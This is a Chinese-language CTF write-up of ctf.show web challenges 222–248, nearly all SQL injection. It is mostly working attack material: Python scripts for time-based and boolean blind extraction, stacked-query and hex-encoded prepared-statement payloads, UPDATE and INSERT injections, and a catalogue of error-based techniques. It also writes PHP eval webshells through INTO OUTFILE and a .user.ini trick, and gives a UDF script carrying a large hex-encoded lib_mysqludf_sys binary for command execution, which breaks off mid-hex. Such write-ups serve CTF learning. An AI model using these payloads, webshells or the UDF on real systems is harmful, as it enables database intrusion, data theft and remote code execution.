payload

http://36730a3f-87be-420b-b904-12acd5647e85.challenge.ctf.show:8080/api?page=1&limit=1%20%20procedure%20analyse(extractvalue(1,concat(1,database())),1)

web222

可以盲注 file

这里的sleep是没一条数据都要sleep 我的有4条数据根据题目的数据设置合适的sleep

import requests
from time import time
url="http://c03e0ff0-543a-4144-99ce-2908a0f30101.challenge.ctf.show:8080/api/?u="
flag=''
i=0
#查表ctfshow_flaga,ctfshow_user
#payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
# 查字段id,flagaabc,inf
#payload="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flaga'"
payload="select flagaabc from ctfshow_flaga"

while True:
    i+=1
    head=32
    tail=127
    while head<tail:
        mid=(head+tail)>>1
        reurl = url + f"1,if(ascii(substr(({payload}),{i},1))>{mid},sleep(0.1),1)"
        try:
            r=requests.get(reurl,timeout=1)
            tail=mid
        except:
            head=mid+1
    if head!=32:
        flag+=chr(head)
        print(flag)
    else:
        break

web223

ban了数字用true绕过

file

import requests
url='http://ca210c86-2c3d-497e-bd3e-4b8d38370677.challenge.ctf.show:8080/api/?u='
flag=''
i=0
def gettrue(num):
    st='true'
    for i in range(num-1):
        st+='+true'
    return st

while True:
    head=32
    tail=127
    i+=1
    while head<tail:
        mid=(head+tail)>>1
        # 查表ctfshow_flaga,ctfshow_user
        payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # 查字段id,flagaabc,inf
        # payload="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flaga'"
        #payload = "select flagaabc from ctfshow_flaga"
        params={
            'u':f"if(ascii(substr(({payload}),{gettrue(i)},{gettrue(1)}))>{gettrue(mid)},username,'a')"
        }

        r=requests.get(url,params=params)
        if 'passwordAUTO' in r.text:
            print('a')
            head=mid+1
        else:

            tail=mid
    if head!=32:
        flag+=chr(head)
        print(flag)
    else:
        break

web224

参考

将下边的文件上传

payload.bin

文件内容是 file 16进制内容

web225

可以使用show 将数据库名称注入出来

http://2a0ed365-1093-4aa0-98a2-23a9721be17a.challenge.ctf.show:8080/api/?username=1';show tables;&page=1&limit=10

使用handler读取

ctfshow';show tables;handler ctfshow_flagasa open;handler ctfshow_flagasa read first;

预处理读取

';prepare a from concat('sele','ct * from `ctfshow_flagasa`');execute a;#

还可以参考随便注

web226

预处理将sql语句转换成16进制 file

';prepare a from 0x73656c6563742067726f75705f636f6e636174287461626c655f6e616d65292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573207768657265207461626c655f736368656d613d64617461626173652829;execute a;#

file

ctfsh_ow_flagas,ctfshow_user

同样继续查字段和flag就可

web227

参考参考

';prepare a from 0x53454c4543542020202a20202046524f4d202020696e666f726d6174696f6e5f736368656d612e526f7574696e6573;execute a;#

web228

同226

web229

同226

web230

同226

web231

在api/index.php下post数据

password=1',username=user() where 1=1#&username=1

file

然后修改payload 查表（banlist,ctfshow_user,flaga）

password=1',username=(select group_concat(table_name) from information_schema.tables where table_schema=database()) where  1=1#&username=1

查字段（id,flagas,info）

password=1',username=(select group_concat(column_name) from information_schema.columns where table_name='flaga') where  1=1#&username=1

查falg

password=1',username=(select flagas from flaga) where  1=1#&username=1

web232

上边的payload也同样可以和上边一样把md5闭合就行了

password=c4ca4238a0b923820dcc509a6f75849b') ,username=(select group_concat(table_name) from information_schema.tables where table_schema=database()) where 1=1#&username=1

file

web233

改成盲注之前的不管用了 sleep时间要设置好每一条数据都要sleep一下

import requests
import time
url="http://15a4a162-cf9c-4a5f-9ddd-d0ac5eda8c30.challenge.ctf.show:8080/api/index.php"
flag=''
i=0
#查表ctfshow_flaga,ctfshow_user
payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
# 查字段id,flagaabc,inf
#payload="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flaga'"
#payload="select flagaabc from ctfshow_flaga"

while True:
    i+=1
    head=32
    tail=127
    while head<tail:
        mid=(head+tail)>>1
        data={
            'password':'1',
            'username':f"1' or if(ascii(substr(({payload}),{i},1))>{mid},sleep(0.05),1)#"
        }
        try:
            r=requests.post(url,data=data,timeout=1)
            tail=mid
        except:
            head=mid+1
    if head!=32:
        flag+=chr(head)
        print(flag)

    else:
        break

web234

过滤了单引号用/将password的单引号转义 $sql = “update ctfshow_user set pass = ‘{$password}’ where username = ‘{$username}’;”;

传入password=\&username=,username=database()# 变成

库名（ctfshow_web）
update ctfshow_user set pass = '\' where username = ',username=database()#';

然后更改payload查数据即可 payload

查表(banlist,ctfshow_user,flag23a)
password=\&username=,username=(select group_concat(table_name) from information_schema.tables where table_schema=database())#

查字段 将表名换成十六进制(id,flagass23s3,info)
password=\&username=,username=(select group_concat(column_name) from information_schema.columns where table_name=0x666c6167323361)#

查flag
password=\&username=,username=(select flagass23s3 from flag23a)#

web235

过滤了or ‘ information 参考By pass information

查表 （banlist,ctfshow_user,flag23a1）
password=\&username=,username=(select group_concat(table_name) from mysql.innodb_table_stats where database_name=database())#

无列名注入

password=\&username=,username=(select group_concat(`2`) from (select 1,2,3 union select * from flag23a1)a)#
或
password=\&username=,username=(select b from (select 1,2 as b,3 union select * from flag23a1 limit 1,1)a)#

web236

查表同上（banlist,ctfshow_user,flaga）

password=\&username=,username=(select group_concat(table_name) from mysql.innodb_table_stats where database_name=database())#

emmm 好像是输出过滤不是输入过滤

password=\&username=,username=(select to_base64(b) from (select 1,2 as b,3 union select * from flaga limit 1,1)a)#

web237

$sql = “insert into ctfshow_user(username,pass) value(‘{$username}’,’{$password}’);”;

闭合单引号把构造的查询结果插入到表里

查表(banlist,ctfshow_user,flag)
username=1',(select group_concat(table_name) from information_schema.tables where table_schema=database()))#&password=1

查字段（id,flagass23s3,info）
username=1',(select group_concat(column_name) from information_schema.columns where table_name='flag'))#&password=1

查flag
username=1',(select group_concat(flagass23s3) from flag))#&password=1

web238

过滤了空格用括号代替应该也ban了*

username=2',(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())))#&password=1

username=2',(select(group_concat(column_name))from(information_schema.columns)where(table_name='flagb')))#&password=1

web239

过滤了or和之前一样by pass information 不会写

web240

import requests
url="http://e8acf4aa-90c8-414d-9630-b2259e10521c.challenge.ctf.show:8080/api/insert.php"
for a1 in "ab":
    for a2 in "ab":
        for a3 in "ab":
            for a4 in "ab":
                for a5 in "ab":
                    payload="flag"+a1+a2+a3+a4+a5
                    data={
                        'username':f"1',(select(flag)from({payload})))#",
                        'password':'1'
                    }
                    print(data)
                    r=requests.post(url,data=data)

跑完脚本然后看下首页刷新就有flag了

web241

时间盲注 sleep设置好容易受网络影响

import requests
import time
url="http://3a73254d-26fa-44cb-bf98-e7502e136583.challenge.ctf.show:8080/api/delete.php"
flag=''
i=0
#查表
payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
# 查字段
#payload="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flaga'"
#payload="select flagaabc from ctfshow_flaga"
while True:
    head=32
    tail=127
    i+=1
    while head<tail:
        mid=(head+tail)>>1
        data={
            'id':f"if(ascii(substr(({payload}),{i},1))>{mid},sleep(0.5),0)"
        }
        try:
            print(data)
            r=requests.post(url,data=data,timeout=0.9)
            tail=mid
        except:
            head=mid+1
        time.sleep(0.2)
    if head!=32:
        flag+=chr(head)
        print(flag)
    else:
        break

web242

SELECT ... INTO OUTFILE 'file_name'
        [CHARACTER SET charset_name]
        [export_options]

export_options:
    [{FIELDS  COLUMNS}
        [TERMINATED BY 'string']//分隔符
        [[OPTIONALLY] ENCLOSED BY 'char']
        [ESCAPED BY 'char']
    ]
    [LINES
        [STARTING BY 'string']
        [TERMINATED BY 'string']
    ]

“OPTION”参数为可选参数选项，其可能的取值有：

`FIELDS TERMINATED BY '字符串'`：设置字符串为字段之间的分隔符，可以为单个或多个字符。默认值是“\t”。

`FIELDS ENCLOSED BY '字符'`：设置字符来括住字段的值，只能为单个字符。默认情况下不使用任何符号。

`FIELDS OPTIONALLY ENCLOSED BY '字符'`：设置字符来括住CHAR、VARCHAR和TEXT等字符型字段。默认情况下不使用任何符号。

`FIELDS ESCAPED BY '字符'`：设置转义字符，只能为单个字符。默认值为“\”。

`LINES STARTING BY '字符串'`：设置每行数据开头的字符，可以为单个或多个字符。默认情况下不使用任何字符。

`LINES TERMINATED BY '字符串'`：设置每行数据结尾的字符，可以为单个或多个字符。默认值是“\n”。

FIELDS TERMINATED BY
LINES STARTING BY
LINES TERMINATED BY
都可以

payload

filename=1.php' LINES STARTING BY '<?php eval($_POST[1]);?>'#

getshell 后flag在服务器根目录

web243

过滤了php

然后dump这里有个index.php 看响应码只是伪造了个403 然后就是写.user.ini了 payload

filename=.user.ini' LINES STARTING BY ';' TERMINATED BY 0x0a6175746f5f70726570656e645f66696c653d312e6a70670a#

首先给每行添加一个；将原本的内容注释掉


auto_prepend_file=1.jpg

然后再上传个1.jpg 用短标签

filename=1.jpg' LINES STARTING BY '<?=eval($_POST[1]);?>'#

然后访问dump getshell

web244

UPDATEXML() 报错注入

UPDATEXML (XML_document, XPath_string, new_value); 
第一个参数：XML_document是String格式，为XML文档对象的名称，文中为Doc 
第二个参数：XPath_string (Xpath格式的字符串) ，如果不了解Xpath语法，可以在网上查找教程。 
第三个参数：new_value，String格式，替换查找到的符合条件的数据 
作用：改变文档中符合条件的节点的值

payload

id=' or updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),1),1)-- -

updatexml的第二个参数开头是1 不符合xpath语法所以会报错然后把括号内的内容报出来

web245

updatexml被过滤使用Extractvalue报错注入 file 和updatexml一样 payload

?id=' or extractvalue(1,concat(0x7e,database(),0x7e))#23

web246

双查询报错原理 payload

' union select 1,count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 1,1),0x7e,floor(rand()*2))a from information_schema.columns group by a-- -

?id=' union select 1,count(*),concat((select flag2 from ctfshow_flags),0x7e,floor(rand()*2))a from information_schema.columns group by a-- -

web247

参考

ceil 是向上取整。 round

ROUND(X) – 表示将值 X 四舍五入为整数，无小数位 ROUND(X,D) – 表示将值 X 四舍五入为小数点后 D 位的数值，D为小数点后小数位数。若要保留 X 值小数点左边的 D 位，可将 D 设为负值。

十二种报错

1. floor + rand + group by
select * from user where id=1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
select * from user where id=1 and (select count(*) from (select 1 union select null union select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

2. ExtractValue
select * from user where id=1 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

3. UpdateXml
select * from user where id=1 and 1=(updatexml(1,concat(0x3a,(select user())),1));

4. Name_Const(>5.0.12)
select * from (select NAME_CONST(version(),0),NAME_CONST(version(),0))x;

5. Join
select * from(select * from mysql.user a join mysql.user b)c;
select * from(select * from mysql.user a join mysql.user b using(Host))c;
select * from(select * from mysql.user a join mysql.user b using(Host,User))c;

6. exp()//mysql5.7貌似不能用
select * from user where id=1 and Exp(~(select * from (select version())a));

7. geometrycollection()//mysql5.7貌似不能用
select * from user where id=1 and geometrycollection((select * from(select * from(select user())a)b));

8. multipoint()//mysql5.7貌似不能用
select * from user where id=1 and multipoint((select * from(select * from(select user())a)b));

9. polygon()//mysql5.7貌似不能用
select * from user where id=1 and polygon((select * from(select * from(select user())a)b));

10. multipolygon()//mysql5.7貌似不能用
select * from user where id=1 and multipolygon((select * from(select * from(select user())a)b));

11. linestring()//mysql5.7貌似不能用
select * from user where id=1 and linestring((select * from(select * from(select user())a)b));

12. multilinestring()//mysql5.7貌似不能用
select * from user where id=1 and multilinestring((select * from(select * from(select user())a)b));

payload

?id=' union select 1,count(*),concat(0x7e,0x7e,(select `flag?` from ctfshow_flagsa limit 0,1),0x7e,ceil(rand()*2))a from information_schema.columns group by a-- -

web248

不会写参考UDF

#参考脚本
#环境：Linux/MariaDB
import requests

url='http://15700a19-71aa-4c90-b3ca-b6db9d77c56d.chall.ctf.show/api/?id='
code='7F454C4602010100000000000000000003003E0001000000800A000000000000400000000000000058180000000000000000000040003800060040001C0019000100000005000000000000000000000000000000000000000000000000000000C414000000000000C41400000000000000002000000000000100000006000000C814000000000000C814200000000000C8142000000000004802000000000000580200000000000000002000000000000200000006000000F814000000000000F814200000000000F814200000000000800100000000000080010000000000000800000000000000040000000400000090010000000000009001000000000000900100000000000024000000000000002400000000000000040000000000000050E574640400000044120000000000004412000000000000441200000000000084000000000000008400000000000000040000000000000051E5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000040000001400000003000000474E5500D7FF1D94176ABA0C150B4F3694D2EC995AE8E1A8000000001100000011000000020000000700000080080248811944C91CA44003980468831100000013000000140000001600000017000000190000001C0000001E000000000000001F00000000000000200000002100000022000000230000002400000000000000CE2CC0BA673C7690EBD3EF0E78722788B98DF10ED971581CA868BE12BBE3927C7E8B92CD1E7066A9C3F9BFBA745BB073371974EC4345D5ECC5A62C1CC3138AFF3B9FD4A0AD73D1C50B5911FEAB5FBE1200000000000000000000000000000000000000000000000000000000000000000300090088090000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000CD00000012000000000000000000000000000000000000001E0100001200000000000000000000000000000000000000620100001200000000000000000000000000000000000000E30000001200000000000000000000000000000000000000B90000001200000000000000000000000000000000000000680100001200000000000000000000000000000000000000160000002200000000000000000000000000000000000000540000001200000000000000000000000000000000000000F00000001200000000000000000000000000000000000000B200000012000000000000000000000000000000000000005A01000012000000000000000000000000000000000000005201000012000000000000000000000000000000000000004C0100001200000000000000000000000000000000000000E800000012000B00D10D000000000000D1000000000000003301000012000B00A90F0000000000000A000000000000001000000012000C00481100000000000000000000000000007800000012000B009F0B0000000000004C00000000000000FF0000001200090088090000000000000000000000000000800100001000F1FF101720000000000000000000000000001501000012000B00130F0000000000002F000000000000008C0100001000F1FF201720000000000000000000000000009B00000012000B00480C0000000000000A000000000000002501000012000B00420F0000000000006700000000000000AA00000012000B00520C00000000000063000000000000005B00000012000B00950B0000000000000A000000000000008E00000012000B00EB0B0000000000005D00000000000000790100001000F1FF101720000000000000000000000000000501000012000B00090F0000000000000A00000000000000C000000012000B00B50C000000000000F100000000000000F700000012000B00A20E00000000000067000000000000003900000012000B004C0B0000000000004900000000000000D400000012000B00A60D0000000000002B000000000000004301000012000B00B30F0000000000005501000000000000005F5F676D6F6E5F73746172745F5F005F66696E69005F5F6378615F66696E616C697A65005F4A765F5265676973746572436C6173736573006C69625F6D7973716C7564665F7379735F696E666F5F696E6974006D656D637079006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974006C69625F6D7973716C7564665F7379735F696E666F007379735F6765745F696E6974007379735F6765745F6465696E6974007379735F67657400676574656E76007374726C656E007379735F7365745F696E6974006D616C6C6F63007379735F7365745F6465696E69740066726565007379735F73657400736574656E76007379735F657865635F696E6974007379735F657865635F6465696E6974007379735F657865630073797374656D007379735F6576616C5F696E6974007379735F6576616C5F6465696E6974007379735F6576616C00706F70656E007265616C6C6F63007374726E6370790066676574730070636C6F7365006C6962632E736F2E36005F6564617461005F5F6273735F7374617274005F656E6400474C4942435F322E322E3500000000000000000000020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001006F0100001000000000000000751A6909000002009101000000000000F0142000000000000800000000000000F0142000000000007816200000000000060000000200000000000000000000008016200000000000060000000300000000000000000000008816200000000000060000000A0000000000000000000000A81620000000000007000000040000000000000000000000B01620000000000007000000050000000000000000000000B81620000000000007000000060000000000000000000000C01620000000000007000000070000000000000000000000C81620000000000007000000080000000000000000000000D01620000000000007000000090000000000000000000000D816200000000000070000000A0000000000000000000000E016200000000000070000000B0000000000000000000000E816200000000000070000000C0000000000000000000000F016200000000000070000000D0000000000000000000000F816200000000000070000000E00000000000000000000000017200000000000070000000F00000000000000000000000817200000000000070000001000000000000000000000004883EC08E8EF000000E88A010000E8750700004883C408C3FF35F20C2000FF25F40C20000F1F4000FF25F20C20006800000000E9E0FFFFFFFF25EA0C20006801000000E9D0FFFFFFFF25E20C20006802000000E9C0FFFFFFFF25DA0C20006803000000E9B0FFFFFFFF25D20C20006804000000E9A0FFFFFFFF25CA0C20006805000000E990FFFFFFFF25C20C20006806000000E980FFFFFFFF25BA0C20006807000000E970FFFFFFFF25B20C20006808000000E960FFFFFFFF25AA0C20006809000000E950FFFFFFFF25A20C2000680A000000E940FFFFFFFF259A0C2000680B000000E930FFFFFFFF25920C2000680C000000E920FFFFFF4883EC08488B05ED0B20004885C07402FFD04883C408C390909090909090909055803D680C2000004889E5415453756248833DD00B200000740C488D3D2F0A2000E84AFFFFFF488D1D130A20004C8D25040A2000488B053D0C20004C29E348C1FB034883EB014839D873200F1F4400004883C0014889051D0C200041FF14C4488B05120C20004839D872E5C605FE0B2000015B415CC9C3660F1F84000000000048833DC009200000554889E5741A488B054B0B20004885C0740E488D3DA7092000C9FFE00F1F4000C9C39090554889E54883EC3048897DE8488975E0488955D8488B45E08B0085C07421488D0DE7050000488B45D8BA320000004889CE4889C7E89BFEFFFFC645FF01EB04C645FF000FB645FFC9C3554889E548897DF8C9C3554889E54883EC3048897DF8488975F0488955E848894DE04C8945D84C894DD0488D0DCA050000488B45E8BA1F0000004889CE4889C7E846FEFFFF488B45E048C7001E000000488B45E8C9C3554889E54883EC2048897DF8488975F0488955E8488B45F08B0083F801751C488B45F0488B40088B0085C0750E488B45F8C60001B800000000EB20488D0D83050000488B45E8BA2B0000004889CE4889C7E8DFFDFFFFB801000000C9C3554889E548897DF8C9C3554889E54883EC4048897DE8488975E0488955D848894DD04C8945C84C894DC0488B45E0488B4010488B004889C7E8BBFDFFFF488945F848837DF8007509488B45C8C60001EB16488B45F84889C7E84BFDFFFF4889C2488B45D0488910488B45F8C9C3554889E54883EC2048897DF8488975F0488955E8488B45F08B0083F8027425488D0D05050000488B45E8BA1F0000004889CE4889C7E831FDFFFFB801000000E9AB000000488B45F0488B40088B0085C07422488D0DF2040000488B45E8BA280000004889CE4889C7E8FEFCFFFFB801000000EB7B488B45F0488B40084883C004C70000000000488B45F0488B4018488B10488B45F0488B40184883C008488B00488D04024883C0024889C7E84BFCFFFF4889C2488B45F848895010488B45F8488B40104885C07522488D0DA4040000488B45E8BA1A0000004889CE4889C7E888FCFFFFB801000000EB05B800000000C9C3554889E54883EC1048897DF8488B45F8488B40104885C07410488B45F8488B40104889C7E811FCFFFFC9C3554889E54883EC3048897DE8488975E0488955D848894DD0488B45E8488B4010488945F0488B45E0488B4018488B004883C001480345F0488945F8488B45E0488B4018488B10488B45E0488B4010488B08488B45F04889CE4889C7E8EFFBFFFF488B45E0488B4018488B00480345F0C60000488B45E0488B40184883C008488B10488B45E0488B40104883C008488B08488B45F84889CE4889C7E8B0FBFFFF488B45E0488B40184883C008488B00480345F8C60000488B4DF8488B45F0BA010000004889CE4889C7E892FBFFFF4898C9C3554889E54883EC3048897DE8488975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E0488B40088B55FC48C1E2024801D08B0085C07507B800000000EB20488D0DC2020000488B45D8BA2B0000004889CE4889C7E81EFBFFFFB801000000C9C3554889E548897DF8C9C3554889E54883EC2048897DF8488975F0488955E848894DE0488B45F0488B4010488B004889C7E882FAFFFF4898C9C3554889E54883EC3048897DE8488975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E0488B40088B55FC48C1E2024801D08B0085C07507B800000000EB20488D0D22020000488B45D8BA2B0000004889CE4889C7E87EFAFFFFB801000000C9C3554889E548897DF8C9C3554889E54881EC500400004889BDD8FBFFFF4889B5D0FBFFFF488995C8FBFFFF48898DC0FBFFFF4C8985B8FBFFFF4C898DB0FBFFFFBF01000000E8BEF9FFFF488985C8FBFFFF48C745F000000000488B85D0FBFFFF488B4010488B00488D352C0200004889C7E852FAFFFF488945E8EB63488D85E0FBFFFF4889C7E8BDF9FFFF488945F8488B45F8488B55F04801C2488B85C8FBFFFF4889D64889C7E80CFAFFFF488985C8FBFFFF488D85E0FBFFFF488B55F0488B8DC8FBFFFF4801D1488B55F84889C64889CFE8D1F9FFFF488B45F8480145F0488B55E8488D85E0FBFFFFBE000400004889C7E831F9FFFF4885C07580488B45E84889C7E850F9FFFF488B85C8FBFFFF0FB60084C0740A4883BDC8FBFFFF00750C488B85B8FBFFFFC60001EB2B488B45F0488B95C8FBFFFF488D0402C60000488B85C8FBFFFF4889C7E8FBF8FFFF488B95C0FBFFFF488902488B85C8FBFFFFC9C39090909090909090554889E5534883EC08488B05A80320004883F8FF7419488D1D9B0320000F1F004883EB08FFD0488B034883F8FF75F14883C4085BC9C390904883EC08E84FF9FFFF4883C408C300004E6F20617267756D656E747320616C6C6F77656420287564663A206C69625F6D7973716C7564665F7379735F696E666F29000000000000006C69625F6D7973716C7564665F7379732076657273696F6E20302E302E33000045787065637465642065786163746C79206F6E6520737472696E67207479706520706172616D6574657200000000000045787065637465642065786163746C792074776F20617267756D656E74730000457870656374656420737472696E67207479706520666F72206E616D6520706172616D6574657200436F756C64206E6F7420616C6C6F63617465206D656D6F7279007200011B033B800000000F00000008F9FFFF9C00000051F9FFFFBC0000005BF9FFFFDC000000A7F9FFFFFC00000004FAFFFF1C0100000EFAFFFF3C01000071FAFFFF5C01000062FBFFFF7C0100008DFBFFFF9C0100005EFCFFFFBC010000C5FCFFFFDC010000CFFCFFFFFC010000FEFCFFFF1C02000065FDFFFF3C0200006FFDFFFF5C0200001400000000000000017A5200017810011B0C0708900100001C0000001C00000064F8FFFF4900000000410E108602430D0602440C070800001C0000003C0000008DF8FFFF0A00000000410E108602430D06450C07080000001C0000005C00000077F8FFFF4C00000000410E108602430D0602470C070800001C0000007C000000A3F8FFFF5D00000000410E108602430D0602580C070800001C0000009C000000E0F8FFFF0A00000000410E108602430D06450C07080000001C000000BC000000CAF8FFFF6300000000410E108602430D06025E0C070800001C000000DC0000000DF9FFFFF100000000410E108602430D0602EC0C070800001C000000FC000000DEF9FFFF2B00000000410E108602430D06660C07080000001C0000001C010000E9F9FFFFD100000000410E108602430D0602CC0C070800001C0000003C0100009AFAFFFF6700000000410E108602430D0602620C070800001C0000005C010000E1FAFFFF0A00000000410E108602430D06450C07080000001C0000007C010000CBFAFFFF2F00000000410E108602430D066A0C07080000001C0000009C010000DAFAFFFF6700000000410E108602430D0602620C070800001C000000BC01000021FBFFFF0A00000000410E108602430D06450C07080000001C000000DC0100000BFBFFFF5501000000410E108602430D060350010C0708000000000000000000FFFFFFFFFFFFFFFF0000000000000000FFFFFFFFFFFFFFFF00000000000000000000000000000000F01420000000000001000000000000006F010000000000000C0000000000000088090000000000000D000000000000004811000000000000F5FEFF6F00000000B8010000000000000500000000000000E805000000000000060000000000000070020000000000000A000000000000009D010000000000000B000000000000001800000000000000030000000000000090162000000000000200000000000000380100000000000014000000000000000700000000000000170000000000000050080000000000000700000000000000F0070000000000000800000000000000600000000000000009000000000000001800000000000000FEFFFF6F00000000D007000000000000FFFFFF6F000000000100000000000000F0FFFF6F000000008607000000000000F9FFFF6F0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000F81420000000000000000000000000000000000000000000B609000000000000C609000000000000D609000000000000E609000000000000F609000000000000060A000000000000160A000000000000260A000000000000360A000000000000460A000000000000560A000000000000660A000000000000760A0000000000004743433A2028474E552920342E342E3720323031323033313320285265642048617420342E342E372D3429004743433A2028474E552920342E342E3720323031323033313320285265642048617420342E342E372D31372900002E73796D746162002E737472746162002E7368737472746162002E6E6F74652E676E752E6275696C642D6964002E676E752E68617368002E64796E73796D002E64796E737472002E676E752E76657273696F6E002E676E752E76657273696F6E5F72002E72656C612E64796E002E72656C612E706C74002E696E6974002E74657874002E66696E69002E726F64617461002E65685F6672616D655F686472002E65685F6672616D65002E63746F7273002E64746F7273002E6A6372002E646174612E72656C2E726F002E64796E616D6963002E676F74002E676F742E706C74002E627373002E636F6D6D656E7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001B0000000700000002000000000000009001000000000000900100000000000024000000000000000000000000000000040000000000000000000000000000002E000000F6FFFF6F0200000000000000B801000000000000B801000000000000B400000000000000030000000000000008000000000000000000000000000000380000000B000000020000000000000070020000000000007002000000000000780300000000000004000000020000000800000000000000180000000000000040000000030000000200000000000000E805000000000000E8050000000000009D0100000000000000000000000000000100000000000000000000000000000048000000FFFFFF6F0200000000000000860700000000000086070000000000004A0000000000000003000000000000000200000000000000020000000000000055000000FEFFFF6F0200000000000000D007000000000000D007000000000000200000000000000004000000010000000800000000000000000000000000000064000000040000000200000000000000F007000000000000F00700000000000060000000000000000300000000000000080000000000000018000000000000006E000000040000000200000000000000500800000000000050080000000000003801000000000000030000000A000000080000000000000018000000000000007800000001000000060000000000000088090000000000008809000000000000180000000000000000000000000000000400000000000000000000000000000073000000010000000600000000000000A009000000000000A009000000000000E0000000000000000000000000000000040000000000000010000000000000007E000000010000000600000000000000800A000000000000800A000000000000C80600000000000000000000000000001000000000000000000000000000000084000000010000000600000000000000481100000000000048110000000000000E000000000000000000000000000000040000000000000000000000000000008A00000001000000020000000000000058110000000000005811000000000000EC0000000000000000000000000000000800000000000000000000000000000092000000010000000200000000000000441200000000000044120000000000008400000000000000000000000000000004000000000000000000000000000000A0000000010000000200000000000000C812000000000000C812000000000000FC01000000000000000000000000000008000000000000000000000000000000AA000000010000000300000000000000C814200000000000C8140000000000001000000000000000000000000000000008000000000000000000000000000000B1000000010000000300000000000000D814200000000000D8140000000000001000000000000000000000000000000008000000000000000000000000000000B8000000010000000300000000000000E814200000000000E8140000000000000800000000000000000000000000000008000000000000000000000000000000BD000000010000000300000000000000F014200000000000F0140000000000000800000000000000000000000000000008000000000000000000000000000000CA000000060000000300000000000000F814200000000000F8140000000000008001000000000000040000000000000008000000000000001000000000000000D3000000010000000300000000000000781620000000000078160000000000001800000000000000000000000000000008000000000000000800000000000000D8000000010000000300000000000000901620000000000090160000000000008000000000000000000000000000000008000000000000000800000000000000E1000000080000000300000000000000101720000000000010170000000000001000000000000000000000000000000008000000000000000000000000000000E60000000100000030000000000000000000000000000000101700000000000059000000000000000000000000000000010000000000000001000000000000001100000003000000000000000000000000000000000000006917000000000000EF00000000000000000000000000000001000000000000000000000000000000010000000200000000000000000000000000000000000000581F00000000000068070000000000001B0000002C00000008000000000000001800000000000000090000000300000000000000000000000000000000000000C02600000000000042030000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000100900100000000000000000000000000000000000003000200B80100000000000000000000000000000000000003000300700200000000000000000000000000000000000003000400E80500000000000000000000000000000000000003000500860700000000000000000000000000000000000003000600D00700000000000000000000000000000000000003000700F00700000000000000000000000000000000000003000800500800000000000000000000000000000000000003000900880900000000000000000000000000000000000003000A00A00900000000000000000000000000000000000003000B00800A00000000000000000000000000000000000003000C00481100000000000000000000000000000000000003000D00581100000000000000000000000000000000000003000E00441200000000000000000000000000000000000003000F00C81200000000000000000000000000000000000003001000C81420000000000000000000000000000000000003001100D81420000000000000000000000000000000000003001200E81420000000000000000000000000000000000003001300F01420000000000000000000000000000000000003001400F81420000000000000000000000000000000000003001500781620000000000000000000000000000000000003001600901620000000000000000000000000000000000003001700101720000000000000000000000000000000000003001800000000000000000000000000000000000100000002000B00800A0000000000000000000000000000110000000400F1FF000000000000000000000000000000001C00000001001000C81420000000000000000000000000002A00000001001100D81420000000000000000000000000003800000001001200E81420000000000000000000000000004500000002000B00A00A00000000000000000000000000005B00000001001700101720000000000001000000000000006A00000001001700181720000000000008000000000000007800000002000B00200B0000000000000000000000000000110000000400F1FF000000000000000000000000000000008400000001001000D01420000000000000000000000000009100000001000F00C01400000000000000000000000000009F00000001001200E8142000000000000000000000000000AB00000002000B0010110000000000000000000000000000C10000000400F1FF00000000000000000000000000000000D40000000100F1FF90162000000000000000000000000000EA00000001001300F0142000000000000000000000000000F700000001001100E0142000000000000000000000000000040100000100F1FFF81420000000000000000000000000000D01000012000B00D10D000000000000D1000000000000001501000012000B00130F0000000000002F000000000000001E01000020000000000000000000000000000000000000002D01000020000000000000000000000000000000000000004101000012000C00481100000000000000000000000000004701000012000B00A90F0000000000000A000000000000005701000012000000000000000000000000000000000000006B01000012000000000000000000000000000000000000007F01000012000B00A20E00000000000067000000000000008D01000012000B00B30F0000000000005501000000000000960100001200000000000000000000000000000000000000A901000012000B00950B0000000000000A00000000000000C601000012000B00B50C000000000000F100000000000000D30100001200000000000000000000000000000000000000E50100001200000000000000000000000000000000000000F901000012000000000000000000000000000000000000000D02000012000B004C0B00000000000049000000000000002802000022000000000000000000000000000000000000004402000012000B00A60D0000000000002B000000000000005302000012000B00EB0B0000000000005D000000000000006002000012000B00480C0000000000000A000000000000006F02000012000000000000000000000000000000000000008302000012000B00420F0000000000006700000000000000910200001200000000000000000000000000000000000000A50200001200000000000000000000000000000000000000B902000012000B00520C0000000000006300000000000000C10200001000F1FF10172000000000000000000000000000CD02000012000B009F0B0000000000004C00000000000000E30200001000F1FF20172000000000000000000000000000E80200001200000000000000000000000000000000000000FD02000012000B00090F0000000000000A000000000000000D0300001200000000000000000000000000000000000000220300001000F1FF101720000000000000000000000000002903000012000000000000000000000000000000000000003C03000012000900880900000000000000000000000000000063616C6C5F676D6F6E5F73746172740063727473747566662E63005F5F43544F525F4C4953545F5F005F5F44544F525F4C4953545F5F005F5F4A43525F4C4953545F5F005F5F646F5F676C6F62616C5F64746F72735F61757800636F6D706C657465642E363335320064746F725F6964782E36333534006672616D655F64756D6D79005F5F43544F525F454E445F5F005F5F4652414D455F454E445F5F005F5F4A43525F454E445F5F005F5F646F5F676C6F62616C5F63746F72735F617578006C69625F6D7973716C7564665F7379732E63005F474C4F42414C5F4F46465345545F5441424